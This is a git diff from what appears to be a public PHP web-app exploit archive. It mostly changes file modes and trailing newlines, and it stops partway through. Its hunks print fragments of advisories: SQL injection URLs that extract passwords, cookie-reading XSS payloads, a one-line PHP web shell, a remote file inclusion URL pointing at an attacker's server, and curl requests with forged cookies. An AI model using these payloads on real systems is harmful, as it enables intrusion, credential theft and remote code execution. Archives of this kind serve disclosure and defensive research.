@@ -14,5 +14,4 @@ Vulnerability : ?option=com_rsfiles&view=files&layout=agreement&tmpl=component&c http://server/?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1/**/aNd/**/1=0/**/uNioN++sElecT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version())-- ********************************* -# Turkey. - \ No newline at end of file +# Turkey. \ No newline at end of file diff --git a/platforms/php/webapps/24858.html b/platforms/php/webapps/24858.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2486.txt b/platforms/php/webapps/2486.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24861.txt b/platforms/php/webapps/24861.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24862.txt b/platforms/php/webapps/24862.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24867.html b/platforms/php/webapps/24867.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24869.txt b/platforms/php/webapps/24869.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2487.php b/platforms/php/webapps/2487.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24870.txt b/platforms/php/webapps/24870.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24871.txt b/platforms/php/webapps/24871.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24873.txt b/platforms/php/webapps/24873.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24877.txt b/platforms/php/webapps/24877.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24879.txt b/platforms/php/webapps/24879.txt old mode 100755 new mode 100644 index f15ce9bad..9ceb4fe30 --- a/platforms/php/webapps/24879.txt +++ b/platforms/php/webapps/24879.txt @@ -85,7 +85,4 @@ $insertuser = mysql_query("INSERT INTO clients VALUES('', '$username', '$md5pass Only using stripslahes which will not protect against doing sql injection attack. -#independent Pakistani Security Researcher - - - \ No newline at end of file +#independent Pakistani Security Researcher \ No newline at end of file diff --git a/platforms/php/webapps/2488.txt b/platforms/php/webapps/2488.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24881.txt b/platforms/php/webapps/24881.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24889.txt b/platforms/php/webapps/24889.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24893.txt b/platforms/php/webapps/24893.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24894.txt b/platforms/php/webapps/24894.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24898.txt b/platforms/php/webapps/24898.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2490.txt b/platforms/php/webapps/2490.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24906.txt b/platforms/php/webapps/24906.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24911.txt b/platforms/php/webapps/24911.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24913.txt b/platforms/php/webapps/24913.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24914.txt b/platforms/php/webapps/24914.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24921.txt b/platforms/php/webapps/24921.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24927.txt b/platforms/php/webapps/24927.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24934.txt b/platforms/php/webapps/24934.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2494.txt b/platforms/php/webapps/2494.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24942.txt b/platforms/php/webapps/24942.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2495.txt b/platforms/php/webapps/2495.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24953.txt b/platforms/php/webapps/24953.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24954.txt b/platforms/php/webapps/24954.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24957.txt b/platforms/php/webapps/24957.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24959.txt b/platforms/php/webapps/24959.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2496.txt b/platforms/php/webapps/2496.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24960.txt b/platforms/php/webapps/24960.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24965.txt b/platforms/php/webapps/24965.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24969.txt b/platforms/php/webapps/24969.txt old mode 100755 new mode 100644 index 1d698a56b..ffa130bef --- a/platforms/php/webapps/24969.txt +++ b/platforms/php/webapps/24969.txt @@ -66,4 +66,4 @@ else die(" [+] Exploit was unsuccessful.\n"); } -?> \ No newline at end of file +?> \ No newline at end of file diff --git a/platforms/php/webapps/2497.txt b/platforms/php/webapps/2497.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24973.txt b/platforms/php/webapps/24973.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2498.php b/platforms/php/webapps/2498.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24987.txt b/platforms/php/webapps/24987.txt old mode 100755 new mode 100644 index 46bd4dd2c..b59bb9b65 --- a/platforms/php/webapps/24987.txt +++ b/platforms/php/webapps/24987.txt @@ -7,4 +7,4 @@ If successful, the attacker can execute arbitrary script code on a vulnerable se This issue was identified in versions of JSBoard 2.0.8 and prior and JSBoard-win32 1.3.11a prior. Script file name: -attack.php.hwp \ No newline at end of file +attack.php.hwp \ No newline at end of file diff --git a/platforms/php/webapps/24988.txt b/platforms/php/webapps/24988.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24989.txt b/platforms/php/webapps/24989.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2499.php b/platforms/php/webapps/2499.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24990.txt b/platforms/php/webapps/24990.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24991.txt b/platforms/php/webapps/24991.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24992.txt b/platforms/php/webapps/24992.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24993.txt b/platforms/php/webapps/24993.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/24994.txt b/platforms/php/webapps/24994.txt old mode 100755 new mode 100644 index 172750b16..9eeeab59c --- a/platforms/php/webapps/24994.txt +++ b/platforms/php/webapps/24994.txt @@ -7,4 +7,4 @@ If successful, the attacker can execute arbitrary script code on a vulnerable se MediaWiki 1.3.8 and prior versions are affected by this issue. Script file name: -attack.php.rar \ No newline at end of file +attack.php.rar \ No newline at end of file diff --git a/platforms/php/webapps/25002.txt b/platforms/php/webapps/25002.txt old mode 100755 new mode 100644 index 80457fa59..8160d8d4c --- a/platforms/php/webapps/25002.txt +++ b/platforms/php/webapps/25002.txt @@ -75,4 +75,4 @@ http://www.reactionpenetrationtesting.co.uk http://www.reactionpenetrationtesting.co.uk/research.html -http://www.reactionpenetrationtesting.co.uk/security-testing-services.html \ No newline at end of file +http://www.reactionpenetrationtesting.co.uk/security-testing-services.html \ No newline at end of file diff --git a/platforms/php/webapps/25003.txt b/platforms/php/webapps/25003.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2501.txt b/platforms/php/webapps/2501.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25014.txt b/platforms/php/webapps/25014.txt old mode 100755 new mode 100644 index ad7212a85..3a8fd8588 --- a/platforms/php/webapps/25014.txt +++ b/platforms/php/webapps/25014.txt @@ -12,4 +12,4 @@ http://www.example.com/modules.php?name=WorkBoard&file=project&project_id= http://www.example.com/modules.php?name=Work_Board&op=Task&task_id=7[XSS_code] http://www.example.com/modules.php?name=Work_Board&op=Task&task_id= -5%3Cbody%3E%3Cp%3E%3Ch1%3EWorkboard+XSS%20Pow@!!+%21%21%21+lostmon+was+here+%3AD%3C/h1%3E \ No newline at end of file +5%3Cbody%3E%3Cp%3E%3Ch1%3EWorkboard+XSS%20Pow@!!+%21%21%21+lostmon+was+here+%3AD%3C/h1%3E \ No newline at end of file diff --git a/platforms/php/webapps/2502.txt b/platforms/php/webapps/2502.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2503.txt b/platforms/php/webapps/2503.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25037.txt b/platforms/php/webapps/25037.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25038.txt b/platforms/php/webapps/25038.txt old mode 100755 new mode 100644 index fbfcbeb7c..895b9ba0c --- a/platforms/php/webapps/25038.txt +++ b/platforms/php/webapps/25038.txt @@ -13,4 +13,4 @@ http://www.example.com/index.php?_a=knowledgebase&_j=questiondetails&_i=[SQL] http://www.example.com/index.php?_a=tickets&_m=viewmain&email22=blah@blah&ticketkey22=[ SQL] -http://www.example.com/index.php?_a=tickets&_m=viewmain&email22=[SQL]&ticketkey22= \ No newline at end of file +http://www.example.com/index.php?_a=tickets&_m=viewmain&email22=[SQL]&ticketkey22= \ No newline at end of file diff --git a/platforms/php/webapps/2504.txt b/platforms/php/webapps/2504.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25043.txt b/platforms/php/webapps/25043.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25044.txt b/platforms/php/webapps/25044.txt old mode 100755 new mode 100644 index c5af732de..cca49c560 --- a/platforms/php/webapps/25044.txt +++ b/platforms/php/webapps/25044.txt @@ -5,4 +5,4 @@ PhpGroupWare is reported to be susceptible to a HTML injection vulnerability. Th The attacker-supplied HTML and script code would be able to access properties of the site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user. http://[target]/[phpgroupware_directory]/index.php?menuaction=calendar.uicalendar.planner -POST DATA: date="><script>alert(document.cookie)</script> \ No newline at end of file +POST DATA: date="><script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/25045.txt b/platforms/php/webapps/25045.txt old mode 100755 new mode 100644 index 6f95f0a0c..248eca71a --- a/platforms/php/webapps/25045.txt +++ b/platforms/php/webapps/25045.txt @@ -4,4 +4,4 @@ A remote SQL injection vulnerability reportedly affects 2Bgal. This issue is due An attacker may leverage this issue to manipulate SQL query strings and potentially carry out arbitrary database queries. This may facilitate the disclosure or corruption of sensitive database information. -http://www.example.com/2bgal/disp_album.php?id_album=2%20UNION%20SELECT%20passwd%20as%20nom,%20idpere%20FROM%20galbumlist%20LIMIT%201;-- \ No newline at end of file +http://www.example.com/2bgal/disp_album.php?id_album=2%20UNION%20SELECT%20passwd%20as%20nom,%20idpere%20FROM%20galbumlist%20LIMIT%201;-- \ No newline at end of file diff --git a/platforms/php/webapps/2505.txt b/platforms/php/webapps/2505.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25053.html b/platforms/php/webapps/25053.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25058.txt b/platforms/php/webapps/25058.txt old mode 100755 new mode 100644 index e7c045a63..36eec0c58 --- a/platforms/php/webapps/25058.txt +++ b/platforms/php/webapps/25058.txt @@ -8,4 +8,4 @@ Exponent 0.95 is reported prone to these issues. It is likely that previous vers http://www.example.com/endon/mod.php?action=[BLABLA]&module=[XSS] http://www.example.com/expo/index.php?action=createuser&module=%3Cscript%3Ealert(document.cookie)%3C/script%3E -http://www.example.com/expo/index.php?action=view&id=2&module=<h1>Tes</h1> \ No newline at end of file +http://www.example.com/expo/index.php?action=view&id=2&module=<h1>Tes</h1> \ No newline at end of file diff --git a/platforms/php/webapps/25059.txt b/platforms/php/webapps/25059.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2506.txt b/platforms/php/webapps/2506.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25062.txt b/platforms/php/webapps/25062.txt old mode 100755 new mode 100644 index 1527599d4..b741507d0 --- a/platforms/php/webapps/25062.txt +++ b/platforms/php/webapps/25062.txt @@ -8,4 +8,4 @@ index.php?product_id=477&pageactionprev=viewpricelist&sta rt=0"><script>alert(do index.php?product_id=477&pageactionprev=viewpricelist&start=0&category_id="><script>alert(document.d omain);</script>&keyword= index.php?product_id=477&pageactionprev=viewpricelist&start=0&category_id=&keyword="><script>alert(document.domain);</script> index.php?pageac tion=viewpricelist"><script>alert(document.domain);</script> -index.php?product_id=477"><script>alert(document.domain);</script>&pageactionprev=viewpricelist&start=0&cate gory_id=&keyword= \ No newline at end of file +index.php?product_id=477"><script>alert(document.domain);</script>&pageactionprev=viewpricelist&start=0&cate gory_id=&keyword= \ No newline at end of file diff --git a/platforms/php/webapps/25064.txt b/platforms/php/webapps/25064.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25065.txt b/platforms/php/webapps/25065.txt old mode 100755 new mode 100644 index 4622d46a3..8d6fc237f --- a/platforms/php/webapps/25065.txt +++ b/platforms/php/webapps/25065.txt @@ -16,4 +16,4 @@ Content-Type: application/download <?php system($_GET[cmd]); -?> \ No newline at end of file +?> \ No newline at end of file diff --git a/platforms/php/webapps/25068.txt b/platforms/php/webapps/25068.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25069.txt b/platforms/php/webapps/25069.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2507.txt b/platforms/php/webapps/2507.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25071.txt b/platforms/php/webapps/25071.txt old mode 100755 new mode 100644 index aa2920c3a..126afc63b --- a/platforms/php/webapps/25071.txt +++ b/platforms/php/webapps/25071.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/12399/info Infinite Mobile Delivery Webmail is reportedly affected by a path disclosure vulnerability. This issue could permit a malicious user to expose the root path of the affected application. -http://www-webmailusersite-com/username/Folder:? \ No newline at end of file +http://www-webmailusersite-com/username/Folder:? \ No newline at end of file diff --git a/platforms/php/webapps/25074.txt b/platforms/php/webapps/25074.txt old mode 100755 new mode 100644 index 350178bb1..aea6960b9 --- a/platforms/php/webapps/25074.txt +++ b/platforms/php/webapps/25074.txt @@ -8,4 +8,4 @@ Incontent version 3.0 is reported to be susceptible to this vulnerability. Other http://www.example.com/modules/incontent/index.php?op=aff&option=0&url=../../. ./index.php -http://www.example.com/modules/incontent/index.php?op=aff&optio n=0&url=../../../mainfile.php \ No newline at end of file +http://www.example.com/modules/incontent/index.php?op=aff&optio n=0&url=../../../mainfile.php \ No newline at end of file diff --git a/platforms/php/webapps/2508.txt b/platforms/php/webapps/2508.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25087.txt b/platforms/php/webapps/25087.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25088.txt b/platforms/php/webapps/25088.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25089.txt b/platforms/php/webapps/25089.txt old mode 100755 new mode 100644 index b0fb64185..0df94baf6 --- a/platforms/php/webapps/25089.txt +++ b/platforms/php/webapps/25089.txt @@ -4,4 +4,4 @@ PHP-Fusion is reportedly affected by an information disclosure vulnerability. Th It is reported that an attacker could leverage this vulnerability to view any thread of protected forums on an affected version of the application. All PHP-Fusion 4 versions are reportedly affected by this vulnerability; earlier versions may also be vulnerable. -http://www.example.com/fusion_forum/viewthread.php?forum_id=10000&forum_cat=100000&thread_id=2 \ No newline at end of file +http://www.example.com/fusion_forum/viewthread.php?forum_id=10000&forum_cat=100000&thread_id=2 \ No newline at end of file diff --git a/platforms/php/webapps/2509.txt b/platforms/php/webapps/2509.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25090.txt b/platforms/php/webapps/25090.txt old mode 100755 new mode 100644 index e6c6181c7..7de492192 --- a/platforms/php/webapps/25090.txt +++ b/platforms/php/webapps/25090.txt @@ -6,4 +6,4 @@ A malicious user could exploit this vulnerability to bypass user authentication This vulnerability is reported to affect xGB version 2.0; earlier versions may also be vulnerable. -http://www.example.com/xGB.php?act=admin&do=edit \ No newline at end of file +http://www.example.com/xGB.php?act=admin&do=edit \ No newline at end of file diff --git a/platforms/php/webapps/25093.txt b/platforms/php/webapps/25093.txt old mode 100755 new mode 100644 index b5db8f183..7cc463921 --- a/platforms/php/webapps/25093.txt +++ b/platforms/php/webapps/25093.txt @@ -8,4 +8,4 @@ MercuryBoard 1.1.1 and prior versions are affected by this vulnerability. http://www.example.com/mercuryboard/index.php?a=post&s=reply&t=1&qu=10000%20UNION %20SELECT%20user_password,user_name%20from%20mb_users%20where%20user_group%20 -=%201%20limit%201/* \ No newline at end of file +=%201%20limit%201/* \ No newline at end of file diff --git a/platforms/php/webapps/25097.txt b/platforms/php/webapps/25097.txt old mode 100755 new mode 100644 index 1545dcfca..3cdba76a1 --- a/platforms/php/webapps/25097.txt +++ b/platforms/php/webapps/25097.txt @@ -9,4 +9,4 @@ The application is also prone to a cross-site scripting vulnerability. This issu CubeCart 2.0.4 and prior versions are considered to be vulnerable to these issues. http://www.example.com/index.php?&language=<script>var%20test_variable=31 -337;alert(test_variable);</script> \ No newline at end of file +337;alert(test_variable);</script> \ No newline at end of file diff --git a/platforms/php/webapps/25098.txt b/platforms/php/webapps/25098.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25099.txt b/platforms/php/webapps/25099.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2510.txt b/platforms/php/webapps/2510.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25100.txt b/platforms/php/webapps/25100.txt old mode 100755 new mode 100644 index 24b975686..2664460b5 --- a/platforms/php/webapps/25100.txt +++ b/platforms/php/webapps/25100.txt @@ -6,4 +6,4 @@ These issues are reported to affect CitrusDB 0.3.6; earlier versions may also be curl -D - --cookie "id_hash=2378c7b70e77d9c6737d697a46cbe34b; user_name=testor" http://<target>/citrusdb/tools/uploadcc.php --form -userfile=@exploit.csv --form Import=Import \ No newline at end of file +userfile=@exploit.csv --form Import=Import \ No newline at end of file diff --git a/platforms/php/webapps/25101.txt b/platforms/php/webapps/25101.txt old mode 100755 new mode 100644 index e0aa82df2..4455a636d --- a/platforms/php/webapps/25101.txt +++ b/platforms/php/webapps/25101.txt @@ -5,4 +5,4 @@ CitrusDB is reportedly affected by an access validation vulnerability during the These issues are reported to affect CitrusDB 0.3.6; earlier versions may also be affected. THe following proof of concept demonstrates the SQL injection vulnerability: -Reportedly supplying ',,,,, as the contents of the uploaded csv file will make the SQL query in './citrusdb/tools/importcc.php' fail. \ No newline at end of file +Reportedly supplying ',,,,, as the contents of the uploaded csv file will make the SQL query in './citrusdb/tools/importcc.php' fail. \ No newline at end of file diff --git a/platforms/php/webapps/25102.txt b/platforms/php/webapps/25102.txt old mode 100755 new mode 100644 index 1ec1cec15..eec0348b6 --- a/platforms/php/webapps/25102.txt +++ b/platforms/php/webapps/25102.txt @@ -7,4 +7,4 @@ An attacker could exploit this vulnerability to log in as any existing user, inc This issue is reported to affect CitrusDB 0.3.6; earlier versions may also be affected. curl -D - --cookie "id_hash=4b3b2c8666298ae9771e9b3d38c3f26e; -user_name=admin" http://www.example.com/citrusdb/tools/index.php \ No newline at end of file +user_name=admin" http://www.example.com/citrusdb/tools/index.php \ No newline at end of file diff --git a/platforms/php/webapps/25103.txt b/platforms/php/webapps/25103.txt old mode 100755 new mode 100644 index 8ade8de56..2461c151c --- a/platforms/php/webapps/25103.txt +++ b/platforms/php/webapps/25103.txt @@ -5,4 +5,4 @@ It is reported that PHP-Nuke is affected by various cross-site scripting vulnera These issues could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If this link were to be followed, the hostile code may be rendered in the web browser of the victim user. This would occur in the security context of the affected web site and may allow for theft of cookie-based authentication credentials http://www.example.com/nuke75/modules.php?name=Downloads&d_op=NewDownloads&newdownloadshowdays=[xss code here] -http://www.example.com/nuke75/modules.php?name=Web_Links&l_op=NewLinks&newlinkshowdays=[xss code here] \ No newline at end of file +http://www.example.com/nuke75/modules.php?name=Web_Links&l_op=NewLinks&newlinkshowdays=[xss code here] \ No newline at end of file diff --git a/platforms/php/webapps/25104.txt b/platforms/php/webapps/25104.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25105.txt b/platforms/php/webapps/25105.txt old mode 100755 new mode 100644 index 2ec8ef66e..08f77c027 --- a/platforms/php/webapps/25105.txt +++ b/platforms/php/webapps/25105.txt @@ -6,4 +6,4 @@ This issue could permit a remote attacker to create a malicious URI link that in This vulnerability is reported to exist in osCommerce version 2.2-MS2, other versions might also be affected. -http://www.example.com/contact_us.php?&name=1&email=1&enquiry=%3C/textarea%3E%3Cscript%3Ealert('w00t');%3C/script%3E \ No newline at end of file +http://www.example.com/contact_us.php?&name=1&email=1&enquiry=%3C/textarea%3E%3Cscript%3Ealert('w00t');%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/25109.txt b/platforms/php/webapps/25109.txt old mode 100755 new mode 100644 index ace99fccb..788817a71 --- a/platforms/php/webapps/25109.txt +++ b/platforms/php/webapps/25109.txt @@ -16,4 +16,4 @@ http://server.com/forums.php?action=showmsg&mid=-99%27 UNION SELECT null,null,nu http://server.com/forums.php?action=board&bid=-99%27UNION SELECT null,null,password,null FROM dcp5_members WHERE username=%27[username] -Replace [username] in the above examples with the user name you wish to retrieve the password for. \ No newline at end of file +Replace [username] in the above examples with the user name you wish to retrieve the password for. \ No newline at end of file diff --git a/platforms/php/webapps/2511.txt b/platforms/php/webapps/2511.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25111.txt b/platforms/php/webapps/25111.txt old mode 100755 new mode 100644 index 41a38da5f..587c52092 --- a/platforms/php/webapps/25111.txt +++ b/platforms/php/webapps/25111.txt @@ -4,4 +4,4 @@ PaNews is reportedly affected by a cross-site scripting vulnerability. This issu As a result of this vulnerability, it is possible for a remote attacker to create a malicious link containing script code that will be executed in the browser of an unsuspecting user when followed. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/comments.php?op=view&newsid=1&showpost="><h1>AttackerXSSvulnerable<!-- \ No newline at end of file +http://www.example.com/comments.php?op=view&newsid=1&showpost="><h1>AttackerXSSvulnerable<!-- \ No newline at end of file diff --git a/platforms/php/webapps/25112.txt b/platforms/php/webapps/25112.txt old mode 100755 new mode 100644 index 5426809ea..c803e63ce --- a/platforms/php/webapps/25112.txt +++ b/platforms/php/webapps/25112.txt @@ -5,4 +5,4 @@ A remote cross-site scripting vulnerability affects the 'forum.php' script of Me An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. http://www.example.com/index.php?a=forum&f='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E -http://www.example.com/index.php?a=forum&f='><script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/index.php?a=forum&f='><script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/25113.txt b/platforms/php/webapps/25113.txt old mode 100755 new mode 100644 index a94bc1a55..3a6ec7f73 --- a/platforms/php/webapps/25113.txt +++ b/platforms/php/webapps/25113.txt @@ -19,4 +19,4 @@ output: attack payload: telnet example.com GET /login.php HTTP/1.1 -Cookie: webcalendar_session=7c8c3a738e858f4199b6b386743c7c8e906075c47f7b817993414cb6cd94897d7882858abbb8 \ No newline at end of file +Cookie: webcalendar_session=7c8c3a738e858f4199b6b386743c7c8e906075c47f7b817993414cb6cd94897d7882858abbb8 \ No newline at end of file diff --git a/platforms/php/webapps/25114.txt b/platforms/php/webapps/25114.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25115.txt b/platforms/php/webapps/25115.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25116.txt b/platforms/php/webapps/25116.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25117.txt b/platforms/php/webapps/25117.txt old mode 100755 new mode 100644 index 83b631d6e..eba48329d --- a/platforms/php/webapps/25117.txt +++ b/platforms/php/webapps/25117.txt @@ -8,4 +8,4 @@ This vulnerability is reported to affect paFaq beta4; earlier versions may also http://www.example.com/index.php?act=Speak&code=05&poster=1&name=2&question=3&email=4&cat_id=' http://www.example.com/index.php?act=Speak&code=02&cid='&id=1&poster=1&name=2&answer=3&email=4 -http://www.example.com/index.php?act=Speak&code=02&cid=1&id='&poster=1&name=2&answer=3&email=4 \ No newline at end of file +http://www.example.com/index.php?act=Speak&code=02&cid=1&id='&poster=1&name=2&answer=3&email=4 \ No newline at end of file diff --git a/platforms/php/webapps/25118.txt b/platforms/php/webapps/25118.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25119.txt b/platforms/php/webapps/25119.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2512.txt b/platforms/php/webapps/2512.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25120.txt b/platforms/php/webapps/25120.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25121.txt b/platforms/php/webapps/25121.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25123.txt b/platforms/php/webapps/25123.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25125.txt b/platforms/php/webapps/25125.txt old mode 100755 new mode 100644 index 253d557fd..297bd7d25 --- a/platforms/php/webapps/25125.txt +++ b/platforms/php/webapps/25125.txt @@ -18,4 +18,4 @@ filename=ALBANIAN%20RULEZ='%3E%3Cscript%3Ealert(document.cookie)% 3C/script%3E http://www.example.com/zboard.php?id=link&page=ALBANIAN% -20RULEZ='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file +20RULEZ='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/25126.txt b/platforms/php/webapps/25126.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25127.txt b/platforms/php/webapps/25127.txt old mode 100755 new mode 100644 index 86e1be0b3..130b55d4a --- a/platforms/php/webapps/25127.txt +++ b/platforms/php/webapps/25127.txt @@ -8,4 +8,4 @@ An attacker may leverage this issue to execute arbitrary server-side script code The latest version (2.4) of pMachine Pro is reported vulnerable. It is possible that other versions are affected as well. -http://www.example.com/pMachine/pm/add_ons/mail_this_entry/mail_autocheck.php?pm_path=http://attackers-webserver/malicious-code.php? \ No newline at end of file +http://www.example.com/pMachine/pm/add_ons/mail_this_entry/mail_autocheck.php?pm_path=http://attackers-webserver/malicious-code.php? \ No newline at end of file diff --git a/platforms/php/webapps/2513.txt b/platforms/php/webapps/2513.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2514.txt b/platforms/php/webapps/2514.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25143.txt b/platforms/php/webapps/25143.txt old mode 100755 new mode 100644 index 106872688..899d0f473 --- a/platforms/php/webapps/25143.txt +++ b/platforms/php/webapps/25143.txt @@ -8,4 +8,4 @@ This vulnerability is reported to affect Invision Power Board version 1.3.1; pre Invision Power Board 2.0.3 is also reported vulnerable to this issue. -[COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]`style=background:url("javascript:[code]") [/color] \ No newline at end of file +[COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]`style=background:url("javascript:[code]") [/color] \ No newline at end of file diff --git a/platforms/php/webapps/25145.txt b/platforms/php/webapps/25145.txt old mode 100755 new mode 100644 index ccc17e1b1..28fc7dc56 --- a/platforms/php/webapps/25145.txt +++ b/platforms/php/webapps/25145.txt @@ -21,4 +21,4 @@ http://www.example.com/panews/includes/admin_setup.php?access[]=admins&do=update then: -http://www.example.com/panews/includes/config.php?nst=id \ No newline at end of file +http://www.example.com/panews/includes/config.php?nst=id \ No newline at end of file diff --git a/platforms/php/webapps/25149.txt b/platforms/php/webapps/25149.txt old mode 100755 new mode 100644 index 304167fca..a13cd9630 --- a/platforms/php/webapps/25149.txt +++ b/platforms/php/webapps/25149.txt @@ -11,4 +11,4 @@ http://www.example.com/page.php?page_type=catalog_products&type_id[]=2&SESSION_I http://www.example.com/page.php?page_type=catalog_products&type_id[]=2&SESSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type3=catalog_products&search=1&l_price='&u_price=1&Submit=Search -http://www.example.com/page.php?page_type=catalog_products&type_id[]=2&SESSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type3=catalog_products&search=1&l_price=1&u_price='&Submit=Search \ No newline at end of file +http://www.example.com/page.php?page_type=catalog_products&type_id[]=2&SESSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type3=catalog_products&search=1&l_price=1&u_price='&Submit=Search \ No newline at end of file diff --git a/platforms/php/webapps/25151.txt b/platforms/php/webapps/25151.txt old mode 100755 new mode 100644 index 03ed72b9d..e62c4ad66 --- a/platforms/php/webapps/25151.txt +++ b/platforms/php/webapps/25151.txt @@ -4,4 +4,4 @@ PBLang is reportedly affected by a cross-site scripting vulnerability. This issu As a result of this vulnerability, it is possible for a remote attacker to create a malicious link containing script code that will be executed in the browser of an unsuspecting user when followed. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/search.php?s=<script language="javascript">alert("");</script> \ No newline at end of file +http://www.example.com/search.php?s=<script language="javascript">alert("");</script> \ No newline at end of file diff --git a/platforms/php/webapps/25152.txt b/platforms/php/webapps/25152.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25153.txt b/platforms/php/webapps/25153.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25154.txt b/platforms/php/webapps/25154.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25155.txt b/platforms/php/webapps/25155.txt old mode 100755 new mode 100644 index 8ae8c74f3..b6834b7c5 --- a/platforms/php/webapps/25155.txt +++ b/platforms/php/webapps/25155.txt @@ 